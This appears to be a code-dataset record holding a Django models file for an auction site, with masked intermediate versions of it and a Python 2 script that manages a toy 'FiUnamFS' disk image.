timestamp = models.DateTimeField(auto_now_add=timezone.now(), auto_now=False)
product_category = models.ForeignKey(ProductCategory, verbose_name="product category")
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.name)
class AuctionStatus(models.Model):
name = models.CharField(max_length=20)
version = IntegerVersionField()
class Meta:
unique_together = (("name"),)
def __unicode__(self):
return smart_unicode(self.name)
class Auction(models.Model):
title = models.CharField(max_length=20)
current_price = models.DecimalField(max_digits=10, decimal_places=2, default=0,
null=True, blank=True, verbose_name="current bid")
updated_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now())
end_time = models.DateTimeField(verbose_name="end time")
product = models.OneToOneField(Product, related_name='product')
status = models.ForeignKey(AuctionStatus, verbose_name="auction status")
version = IntegerVersionField()
class Meta:
unique_together = (("title"),)
ordering = ['end_time']
def __unicode__(self):
return smart_unicode(self.title)
@classmethod
def fetchActiveAuctions(cls):
try:
queryset = cls.objects.filter(status_id=1).order_by('-end_time').reverse()
return queryset
except IndexError:
return None
@classmethod
def getAuctionByID(cls, aucid):
try:
return cls.objects.get(id=aucid, status_id=1)
except IndexError:
return None
@classmethod
def getAuctionByCategory(cls, catid):
try:
prodcat = Product.objects.filter(product_category=catid)
queryset = Auction.objects.filter(product_id=prodcat, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getAuctionByOwner(cls, ownerid):
try:
myprod = Product.objects.filter(seller_id=ownerid)
queryset = Auction.objects.filter(product_id=myprod, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getOwnerByAuctionID(cls, aucid):
try:
queryset = Auction.objects.get(id=aucid, status_id=1)
myprod = Product.objects.get(id=queryset.product_id)
seller = myprod.seller
return seller
except IndexError:
return None
@classmethod
def getAuctionByProductID(cls, product_id):
try:
queryset = Auction.objects.get(product=product_id, status_id=1)
return queryset
except IndexError:
return None
class Bidder(models.Model):
contender = models.ForeignKey(User, related_name='buyer', verbose_name='contender')
auctions = models.ManyToManyField(Auction, related_name='auctions', through='AuctionBidder')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.contender)
class Meta:
ordering = ["contender"]
class AuctionBidder(models.Model):
unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')
auc = models.ForeignKey(Auction, related_name='unique_auction')
bid_amount = models.DecimalField(max_digits=10, decimal_places=2,
verbose_name="bid amount")
bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now(), )
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.auc)
class Meta:
ordering = ["bid_time"]
|
flexible
|
{
"blob_id": "9bb15842b39c7fd3e6f6c0048a51c2b2112ddb94",
"index": 8082,
"step-1": "<mask token>\n\n\nclass Auction(models.Model):\n title = models.CharField(max_length=20)\n current_price = models.DecimalField(max_digits=10, decimal_places=2,\n default=0, null=True, blank=True, verbose_name='current bid')\n updated_time = models.DateTimeField(auto_now_add=False, auto_now=\n timezone.now())\n end_time = models.DateTimeField(verbose_name='end time')\n product = models.OneToOneField(Product, related_name='product')\n status = models.ForeignKey(AuctionStatus, verbose_name='auction status')\n version = IntegerVersionField()\n\n\n class Meta:\n unique_together = 'title',\n ordering = ['end_time']\n\n def __unicode__(self):\n return smart_unicode(self.title)\n\n @classmethod\n def fetchActiveAuctions(cls):\n try:\n queryset = cls.objects.filter(status_id=1).order_by('-end_time'\n ).reverse()\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByID(cls, aucid):\n try:\n return cls.objects.get(id=aucid, status_id=1)\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByCategory(cls, catid):\n try:\n prodcat = Product.objects.filter(product_category=catid)\n queryset = Auction.objects.filter(product_id=prodcat, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByOwner(cls, ownerid):\n try:\n myprod = Product.objects.filter(seller_id=ownerid)\n queryset = Auction.objects.filter(product_id=myprod, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getOwnerByAuctionID(cls, aucid):\n try:\n queryset = Auction.objects.get(id=aucid, status_id=1)\n myprod = Product.objects.get(id=queryset.product_id)\n seller = myprod.seller\n return seller\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByProductID(cls, product_id):\n try:\n queryset = Auction.objects.get(product=product_id, status_id=1)\n return queryset\n except IndexError:\n return None\n\n\nclass Bidder(models.Model):\n contender = models.ForeignKey(User, related_name='buyer', verbose_name=\n 'contender')\n auctions = models.ManyToManyField(Auction, related_name='auctions',\n through='AuctionBidder')\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.contender)\n\n\n class Meta:\n ordering = ['contender']\n\n\nclass AuctionBidder(models.Model):\n unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')\n auc = models.ForeignKey(Auction, related_name='unique_auction')\n bid_amount = models.DecimalField(max_digits=10, decimal_places=2,\n verbose_name='bid amount')\n bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()\n )\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.auc)\n\n\n class Meta:\n ordering = ['bid_time']\n",
"step-2": "<mask token>\n\n\nclass Product(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass AuctionStatus(models.Model):\n name = models.CharField(max_length=20)\n version = IntegerVersionField()\n\n\n class Meta:\n unique_together = 'name',\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass Auction(models.Model):\n title = models.CharField(max_length=20)\n current_price = models.DecimalField(max_digits=10, decimal_places=2,\n default=0, null=True, blank=True, verbose_name='current bid')\n updated_time = models.DateTimeField(auto_now_add=False, auto_now=\n timezone.now())\n end_time = models.DateTimeField(verbose_name='end time')\n product = models.OneToOneField(Product, related_name='product')\n status = models.ForeignKey(AuctionStatus, verbose_name='auction status')\n version = IntegerVersionField()\n\n\n class Meta:\n unique_together = 'title',\n ordering = ['end_time']\n\n def __unicode__(self):\n return smart_unicode(self.title)\n\n @classmethod\n def fetchActiveAuctions(cls):\n try:\n queryset = cls.objects.filter(status_id=1).order_by('-end_time'\n ).reverse()\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByID(cls, aucid):\n try:\n return cls.objects.get(id=aucid, status_id=1)\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByCategory(cls, catid):\n try:\n prodcat = Product.objects.filter(product_category=catid)\n queryset = Auction.objects.filter(product_id=prodcat, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByOwner(cls, ownerid):\n try:\n myprod = Product.objects.filter(seller_id=ownerid)\n queryset = Auction.objects.filter(product_id=myprod, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getOwnerByAuctionID(cls, aucid):\n try:\n queryset = Auction.objects.get(id=aucid, status_id=1)\n myprod = Product.objects.get(id=queryset.product_id)\n seller = myprod.seller\n return seller\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByProductID(cls, product_id):\n try:\n queryset = Auction.objects.get(product=product_id, status_id=1)\n return queryset\n except IndexError:\n return None\n\n\nclass Bidder(models.Model):\n contender = models.ForeignKey(User, related_name='buyer', verbose_name=\n 'contender')\n auctions = models.ManyToManyField(Auction, related_name='auctions',\n through='AuctionBidder')\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.contender)\n\n\n class Meta:\n ordering = ['contender']\n\n\nclass AuctionBidder(models.Model):\n unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')\n auc = models.ForeignKey(Auction, related_name='unique_auction')\n bid_amount = models.DecimalField(max_digits=10, decimal_places=2,\n verbose_name='bid amount')\n bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()\n )\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.auc)\n\n\n class Meta:\n ordering = ['bid_time']\n",
"step-3": "<mask token>\n\n\nclass ProductCategory(models.Model):\n <mask token>\n\n\n class Meta:\n unique_together = 'name',\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass Product(models.Model):\n name = models.CharField(max_length=20)\n seller = models.ForeignKey(User, verbose_name='seller')\n initial_price = models.DecimalField(max_digits=10, decimal_places=2,\n validators=[MinValueValidator(0)], verbose_name='starting bid')\n description = models.TextField(max_length=280)\n timestamp = models.DateTimeField(auto_now_add=timezone.now(), auto_now=\n False)\n product_category = models.ForeignKey(ProductCategory, verbose_name=\n 'product category')\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass AuctionStatus(models.Model):\n name = models.CharField(max_length=20)\n version = IntegerVersionField()\n\n\n class Meta:\n unique_together = 'name',\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass Auction(models.Model):\n title = models.CharField(max_length=20)\n current_price = models.DecimalField(max_digits=10, decimal_places=2,\n default=0, null=True, blank=True, verbose_name='current bid')\n updated_time = models.DateTimeField(auto_now_add=False, auto_now=\n timezone.now())\n end_time = models.DateTimeField(verbose_name='end time')\n product = models.OneToOneField(Product, related_name='product')\n status = models.ForeignKey(AuctionStatus, verbose_name='auction status')\n version = IntegerVersionField()\n\n\n class Meta:\n unique_together = 'title',\n ordering = ['end_time']\n\n def __unicode__(self):\n return smart_unicode(self.title)\n\n @classmethod\n def fetchActiveAuctions(cls):\n try:\n queryset = cls.objects.filter(status_id=1).order_by('-end_time'\n ).reverse()\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByID(cls, aucid):\n try:\n return cls.objects.get(id=aucid, status_id=1)\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByCategory(cls, catid):\n try:\n prodcat = Product.objects.filter(product_category=catid)\n queryset = Auction.objects.filter(product_id=prodcat, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByOwner(cls, ownerid):\n try:\n myprod = Product.objects.filter(seller_id=ownerid)\n queryset = Auction.objects.filter(product_id=myprod, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getOwnerByAuctionID(cls, aucid):\n try:\n queryset = Auction.objects.get(id=aucid, status_id=1)\n myprod = Product.objects.get(id=queryset.product_id)\n seller = myprod.seller\n return seller\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByProductID(cls, product_id):\n try:\n queryset = Auction.objects.get(product=product_id, status_id=1)\n return queryset\n except IndexError:\n return None\n\n\nclass Bidder(models.Model):\n contender = models.ForeignKey(User, related_name='buyer', verbose_name=\n 'contender')\n auctions = models.ManyToManyField(Auction, related_name='auctions',\n through='AuctionBidder')\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.contender)\n\n\n class Meta:\n ordering = ['contender']\n\n\nclass AuctionBidder(models.Model):\n unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')\n auc = models.ForeignKey(Auction, related_name='unique_auction')\n bid_amount = models.DecimalField(max_digits=10, decimal_places=2,\n verbose_name='bid 
amount')\n bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()\n )\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.auc)\n\n\n class Meta:\n ordering = ['bid_time']\n",
"step-4": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.utils.encoding import smart_unicode\nfrom django.core.validators import MinValueValidator\nfrom django.utils import timezone\nfrom concurrency.fields import IntegerVersionField\n\n\nclass ProductCategory(models.Model):\n name = models.CharField(max_length=20)\n\n\n class Meta:\n unique_together = 'name',\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass Product(models.Model):\n name = models.CharField(max_length=20)\n seller = models.ForeignKey(User, verbose_name='seller')\n initial_price = models.DecimalField(max_digits=10, decimal_places=2,\n validators=[MinValueValidator(0)], verbose_name='starting bid')\n description = models.TextField(max_length=280)\n timestamp = models.DateTimeField(auto_now_add=timezone.now(), auto_now=\n False)\n product_category = models.ForeignKey(ProductCategory, verbose_name=\n 'product category')\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass AuctionStatus(models.Model):\n name = models.CharField(max_length=20)\n version = IntegerVersionField()\n\n\n class Meta:\n unique_together = 'name',\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass Auction(models.Model):\n title = models.CharField(max_length=20)\n current_price = models.DecimalField(max_digits=10, decimal_places=2,\n default=0, null=True, blank=True, verbose_name='current bid')\n updated_time = models.DateTimeField(auto_now_add=False, auto_now=\n timezone.now())\n end_time = models.DateTimeField(verbose_name='end time')\n product = models.OneToOneField(Product, related_name='product')\n status = models.ForeignKey(AuctionStatus, verbose_name='auction status')\n version = IntegerVersionField()\n\n\n class Meta:\n unique_together = 'title',\n ordering = ['end_time']\n\n def __unicode__(self):\n return smart_unicode(self.title)\n\n @classmethod\n def fetchActiveAuctions(cls):\n try:\n queryset = cls.objects.filter(status_id=1).order_by('-end_time'\n ).reverse()\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByID(cls, aucid):\n try:\n return cls.objects.get(id=aucid, status_id=1)\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByCategory(cls, catid):\n try:\n prodcat = Product.objects.filter(product_category=catid)\n queryset = Auction.objects.filter(product_id=prodcat, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByOwner(cls, ownerid):\n try:\n myprod = Product.objects.filter(seller_id=ownerid)\n queryset = Auction.objects.filter(product_id=myprod, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getOwnerByAuctionID(cls, aucid):\n try:\n queryset = Auction.objects.get(id=aucid, status_id=1)\n myprod = Product.objects.get(id=queryset.product_id)\n seller = myprod.seller\n return seller\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByProductID(cls, product_id):\n try:\n queryset = Auction.objects.get(product=product_id, status_id=1)\n return queryset\n except IndexError:\n return None\n\n\nclass Bidder(models.Model):\n contender = models.ForeignKey(User, related_name='buyer', verbose_name=\n 'contender')\n auctions = models.ManyToManyField(Auction, related_name='auctions',\n through='AuctionBidder')\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.contender)\n\n\n class Meta:\n ordering = 
['contender']\n\n\nclass AuctionBidder(models.Model):\n unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')\n auc = models.ForeignKey(Auction, related_name='unique_auction')\n bid_amount = models.DecimalField(max_digits=10, decimal_places=2,\n verbose_name='bid amount')\n bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()\n )\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.auc)\n\n\n class Meta:\n ordering = ['bid_time']\n",
"step-5": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.utils.encoding import smart_unicode\nfrom django.core.validators import MinValueValidator\nfrom django.utils import timezone\nfrom concurrency.fields import IntegerVersionField\n\n\nclass ProductCategory(models.Model):\n name = models.CharField(max_length=20)\n\n class Meta:\n unique_together = ((\"name\"),)\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass Product(models.Model):\n name = models.CharField(max_length=20)\n seller = models.ForeignKey(User, verbose_name=\"seller\")\n initial_price = models.DecimalField(max_digits=10, decimal_places=2,\n validators=[MinValueValidator(0)], verbose_name=\"starting bid\")\n description = models.TextField(max_length=280)\n timestamp = models.DateTimeField(auto_now_add=timezone.now(), auto_now=False)\n product_category = models.ForeignKey(ProductCategory, verbose_name=\"product category\")\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass AuctionStatus(models.Model):\n name = models.CharField(max_length=20)\n version = IntegerVersionField()\n\n class Meta:\n unique_together = ((\"name\"),)\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass Auction(models.Model):\n title = models.CharField(max_length=20)\n current_price = models.DecimalField(max_digits=10, decimal_places=2, default=0,\n null=True, blank=True, verbose_name=\"current bid\")\n updated_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now())\n end_time = models.DateTimeField(verbose_name=\"end time\")\n product = models.OneToOneField(Product, related_name='product')\n status = models.ForeignKey(AuctionStatus, verbose_name=\"auction status\")\n version = IntegerVersionField()\n\n class Meta:\n unique_together = ((\"title\"),)\n ordering = ['end_time']\n\n def __unicode__(self):\n return smart_unicode(self.title)\n\n\n @classmethod\n def fetchActiveAuctions(cls):\n try:\n queryset = cls.objects.filter(status_id=1).order_by('-end_time').reverse()\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByID(cls, aucid):\n try:\n return cls.objects.get(id=aucid, status_id=1)\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByCategory(cls, catid):\n try:\n prodcat = Product.objects.filter(product_category=catid)\n queryset = Auction.objects.filter(product_id=prodcat, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByOwner(cls, ownerid):\n try:\n myprod = Product.objects.filter(seller_id=ownerid)\n queryset = Auction.objects.filter(product_id=myprod, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getOwnerByAuctionID(cls, aucid):\n try:\n queryset = Auction.objects.get(id=aucid, status_id=1)\n myprod = Product.objects.get(id=queryset.product_id)\n seller = myprod.seller\n return seller\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByProductID(cls, product_id):\n try:\n queryset = Auction.objects.get(product=product_id, status_id=1)\n return queryset\n except IndexError:\n return None\n\n\nclass Bidder(models.Model):\n contender = models.ForeignKey(User, related_name='buyer', verbose_name='contender')\n auctions = models.ManyToManyField(Auction, related_name='auctions', through='AuctionBidder')\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.contender)\n\n class Meta:\n ordering = 
[\"contender\"]\n\n\nclass AuctionBidder(models.Model):\n unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')\n auc = models.ForeignKey(Auction, related_name='unique_auction')\n bid_amount = models.DecimalField(max_digits=10, decimal_places=2,\n verbose_name=\"bid amount\")\n bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now(), )\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.auc)\n\n class Meta:\n ordering = [\"bid_time\"]\n\n\n\n\n",
"step-ids": [
15,
20,
23,
25,
26
]
}
|
[
15,
20,
23,
25,
26
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def chat(request):
chat_list = Chat.objects.order_by('id_chat')
chat_dict = {'chat': chat_list}
return render(request, 'chats/Chat.html', context=chat_dict)
<|reserved_special_token_1|>
from django.shortcuts import render
from django.http import HttpResponse
from chats.models import Chat
from usuario.models import Usuario
def chat(request):
chat_list = Chat.objects.order_by('id_chat')
chat_dict = {'chat': chat_list}
return render(request, 'chats/Chat.html', context=chat_dict)
<|reserved_special_token_1|>
from django.shortcuts import render
from django.http import HttpResponse
from chats.models import Chat
from usuario.models import Usuario
# Create your views here.
def chat(request):
chat_list = Chat.objects.order_by("id_chat")
chat_dict = {'chat': chat_list}
return render(request,'chats/Chat.html', context=chat_dict)
|
flexible
|
{
"blob_id": "4a14265a9a2338be66e31110bba696e224b6a70f",
"index": 8395,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef chat(request):\n chat_list = Chat.objects.order_by('id_chat')\n chat_dict = {'chat': chat_list}\n return render(request, 'chats/Chat.html', context=chat_dict)\n",
"step-3": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom chats.models import Chat\nfrom usuario.models import Usuario\n\n\ndef chat(request):\n chat_list = Chat.objects.order_by('id_chat')\n chat_dict = {'chat': chat_list}\n return render(request, 'chats/Chat.html', context=chat_dict)\n",
"step-4": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom chats.models import Chat\nfrom usuario.models import Usuario\n\n# Create your views here.\ndef chat(request):\n \n chat_list = Chat.objects.order_by(\"id_chat\")\n chat_dict = {'chat': chat_list}\n\n return render(request,'chats/Chat.html', context=chat_dict)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from sys import exit
from os import stat
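# Read the superblock: every metadata field is stored as plain text at a fixed byte offset in cluster 0.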
file = open("fiunamfs.img","r")
nombre = file.read(8)
file.seek(10)
version = file.read(3)
file.seek(20)
etiqueta = file.read(15)
file.seek(40)
cluster = file.read(5)
file.seek(47)
numero = file.read(2)
file.seek(52)
numeroCompleto = file.read(8)
file.close()
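# Parallel lists holding the 64 directory entries: names, sizes (as text) and start clusters.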
archivos = []
tams = []
clusters = []
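# Find the lowest cluster number that no directory entry references yet.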
def clusterVacio():
    arreAux = []
    busca = 1
    bandera = True
    for i in range(len(clusters)):
        clu = clusters[i]
        try:
            arreAux.append(int(clu))  # cluster numbers are stored as text, possibly space-padded
        except ValueError:
            continue  # free/deleted entries carry no cluster number
    while bandera:
        if busca in arreAux:
            busca = busca + 1
        else:
            bandera = False
    return busca
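# Reload the 64-entry directory; each entry is 64 bytes: 15 name + 8 size + 5 cluster + 36 unused.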
def tablaArchivos():
global archivos
global tams
global clusters
archivos = []
tams = []
clusters = []
file = open("fiunamfs.img","r+")
file.seek(2048)
for i in range(64):
archivos.append(file.read(15))
tams.append(file.read(8))
clusters.append(file.read(5))
file.seek(file.tell()+36)
file.close()
def info():
print("Nombre del Sistema: " + nombre)
print("Version: " + version)
print("Etiqueta del Volumen: " + etiqueta)
print("Tamano del cluster en bytes: " + cluster)
print("Numero de clusters que mide el directorio: " + numero)
print("Numero de cluster que mide la unidad completa: " + numeroCompleto)
def listar():
file = open("fiunamfs.img","r")
file.seek(2048)
for i in range(64):
name = file.read(15)
if name != 'Xx.xXx.xXx.xXx.':
print(name)
file.seek(file.tell()+49)
file.close()
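# Deleting a file only overwrites its directory name with the sentinel 'Xx.xXx.xXx.xXx.'; the data clusters are left as-is.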
def borrar(archivo):
borrado = False
file = open("fiunamfs.img","r+")
file.seek(2048)
for i in range(64):
name = file.read(15)
aux = name.strip()
if aux == archivo:
file.seek(file.tell()-15)
file.write('Xx.xXx.xXx.xXx.')
borrado = True
file.seek(file.tell()+49)
file.close()
return borrado
def tamaArchivo(path):
si = stat(path).st_size
return si
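# Copy a local file into the image: claim the first free directory entry, then write the data into a free cluster.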
def dePcASistema(path, nombre):
    actual = 0
    try:
        new = open(path, "r")  # source file is only read
        file = open("fiunamfs.img", "r+")
        file.seek(2048)
        bandera = False
        tam = stat(path).st_size
        while bandera == False:
            name = file.read(15)
            if name == 'Xx.xXx.xXx.xXx.':
                file.seek(file.tell() - 15)
                file.write(nombre)
                actual = file.tell()  # position of this entry's size field
                print("El archivo fue copiado")
                bandera = True
            file.seek(file.tell() + 49)
        file.close()
        file = open("fiunamfs.img", "r+")
        pa = clusterVacio()
        inde = 2048 * pa  # byte offset of the first free cluster
        tamano = tamaArchivo(path)
        file.seek(inde)
        file.write(new.read(tamano))
        file.close()
        new.close()
        file = open("fiunamfs.img", "r+")
        file.seek(actual)
        file.write(str(tam).rjust(8))  # size field: 8 characters
        file.write(str(pa).rjust(5))  # cluster field: 5 characters
        file.close()
    except:
        print("Este archivo no existe")
def deSistemaAPc(archivo, nombre):
    tam = 0
    clu = 0
    file = open("fiunamfs.img", "r")  # open the image read-only
    file.seek(2048)  # skip the superblock
    new = open(archivo, "w")  # destination file on the local machine
    for i in range(64):
        name = file.read(15)
        aux = name.strip()
        if aux == nombre.strip():
            tam = int(file.read(8))  # size and cluster fields are stored as text
            clu = int(file.read(5))
            file.seek(file.tell() + 36)  # skip the rest of this 64-byte entry
        else:
            file.seek(file.tell() + 49)
    file.close()
    aux2 = 2048 * clu  # byte offset of the file's first cluster
    file = open("fiunamfs.img", "r")
    file.seek(aux2)
    new.write(file.read(tam))
    new.close()
    file.close()
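# Build the 15-character, space-padded entry name from a local path.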
def nombreArchivo(path):
    tam = len(path)
    slash = -1  # keeps the first character when the path has no '/'
    name = ''
    name2 = ''
    for i in range(tam):
        if path[i] == '/':
            slash = i
    for i in range(slash + 1, tam):
        name = name + path[i]
    ## TODO: add a function to trim file names longer than 15 characters
    espaces = 15 - len(name)
    for i in range(espaces):
        name2 = name2 + " "
    return name2 + name
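# The image is only mounted when the superblock magic name and version match.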
if (nombre == "FiUnamFS" and version == "0.7"):
correcto = True
while(correcto):
tablaArchivos()
print("Sistema de Archivos FI Unam FS")
print("1: Listar")
print("2: Copiar archivo")
print("3: Copiar archivo a la computadora")
print("4: Eliminar archivo")
print("5: Desgramentar")
print("6: Mostar informacion del sistema de archivos")
print("7: Salir")
opcion = input("Opcion: ")
if opcion == 6:
info()
elif opcion == 1:
listar()
elif opcion == 4:
archivo = raw_input("Nombre del archivo a borrar: ")
if(borrar(archivo)):
print('El archivo fue borrado')
else:
print('No se encontro el archivo')
elif opcion == 3:
archivo = raw_input("Nombre del archivo a copiar: ")
nombre = nombreArchivo(archivo)
deSistemaAPc(archivo, nombre)
elif opcion == 2:
archivo = raw_input("Nombre del archivo a copiar: ")
nombre = nombreArchivo(archivo)
dePcASistema(archivo, nombre)
elif opcion == 9:
print(archivos)
print(clusters)
print(tams)
elif opcion == 8:
va = clusterVacio()
print (va)
elif opcion == 7:
print("Sistema desmontado")
correcto = False
elif opcion == 5:
print("No se implemento")
else:
print("No se puede abrir el sistema de archivos debido a que no es el archivo correcto o la version correcta. Revise nuevamente que tenga la imagen correcta.")
exit()
|
normal
|
{
"blob_id": "da69fd937153fe2112b9f64411882527274247ef",
"index": 1878,
"step-1": "<mask token>\n\n\ndef clusterVacio():\n arreAux = []\n busca = 1\n bandera = True\n for i in range(len(clusters)):\n clu = clusters[i]\n arreAux.append(int(clu[0]))\n print(arreAux)\n while bandera:\n if busca in arreAux:\n busca = busca + 1\n else:\n bandera = False\n return busca\n\n\ndef tablaArchivos():\n global archivos\n global tams\n global clusters\n archivos = []\n tams = []\n clusters = []\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n archivos.append(file.read(15))\n tams.append(file.read(8))\n clusters.append(file.read(5))\n file.seek(file.tell() + 36)\n file.close()\n\n\ndef info():\n print('Nombre del Sistema: ' + nombre)\n print('Version: ' + version)\n print('Etiqueta del Volumen: ' + etiqueta)\n print('Tamano del cluster en bytes: ' + cluster)\n print('Numero de clusters que mide el directorio: ' + numero)\n print('Numero de cluster que mide la unidad completa: ' + numeroCompleto)\n\n\ndef listar():\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n if name != 'Xx.xXx.xXx.xXx.':\n print(name)\n file.seek(file.tell() + 49)\n file.close()\n\n\ndef borrar(archivo):\n borrado = False\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == archivo:\n file.seek(file.tell() - 15)\n file.write('Xx.xXx.xXx.xXx.')\n borrado = True\n file.seek(file.tell() + 49)\n file.close()\n return borrado\n\n\ndef tamaArchivo(path):\n si = stat(path).st_size\n return si\n\n\n<mask token>\n\n\ndef deSistemaAPc(archivo, nombre):\n tam = 0\n clu = 0\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n new = open(archivo, 'r+')\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == nombre:\n tam = file.read(8)\n clu = file.read(5)\n file.close()\n aux2 = 2048 * clu\n file = open('fiunamfs.img', 'r')\n file.seek(aux2)\n new.write(file.read(tam))\n\n\ndef nombreArchivo(path):\n tam = len(path)\n slash = 0\n name = ''\n name2 = ''\n for i in range(tam):\n if path[i] == '/':\n slash = i\n for i in range(slash + 1, tam):\n name = name + path[i]\n espaces = 15 - len(name)\n for i in range(espaces):\n name2 = name2 + ' '\n return name2 + name\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef clusterVacio():\n arreAux = []\n busca = 1\n bandera = True\n for i in range(len(clusters)):\n clu = clusters[i]\n arreAux.append(int(clu[0]))\n print(arreAux)\n while bandera:\n if busca in arreAux:\n busca = busca + 1\n else:\n bandera = False\n return busca\n\n\ndef tablaArchivos():\n global archivos\n global tams\n global clusters\n archivos = []\n tams = []\n clusters = []\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n archivos.append(file.read(15))\n tams.append(file.read(8))\n clusters.append(file.read(5))\n file.seek(file.tell() + 36)\n file.close()\n\n\ndef info():\n print('Nombre del Sistema: ' + nombre)\n print('Version: ' + version)\n print('Etiqueta del Volumen: ' + etiqueta)\n print('Tamano del cluster en bytes: ' + cluster)\n print('Numero de clusters que mide el directorio: ' + numero)\n print('Numero de cluster que mide la unidad completa: ' + numeroCompleto)\n\n\ndef listar():\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n if name != 'Xx.xXx.xXx.xXx.':\n print(name)\n file.seek(file.tell() + 49)\n file.close()\n\n\ndef borrar(archivo):\n borrado = False\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == archivo:\n file.seek(file.tell() - 15)\n file.write('Xx.xXx.xXx.xXx.')\n borrado = True\n file.seek(file.tell() + 49)\n file.close()\n return borrado\n\n\ndef tamaArchivo(path):\n si = stat(path).st_size\n return si\n\n\ndef dePcASistema(path, nombre):\n posicion = 0\n actual = 0\n try:\n new = open(path, 'r+')\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n bandera = False\n tam = stat(path).st_size\n while bandera == False:\n name = file.read(15)\n if name == 'Xx.xXx.xXx.xXx.':\n file.seek(file.tell() - 15)\n file.write(nombre)\n actual = file.tell()\n print('El archivo fue copiado')\n bandera = True\n file.seek(file.tell() + 49)\n file.close()\n file = open('fiunamfs.img', 'r+')\n pa = clusterVacio()\n inde = 2048 * pa\n tamano = tamaArchivo(path)\n 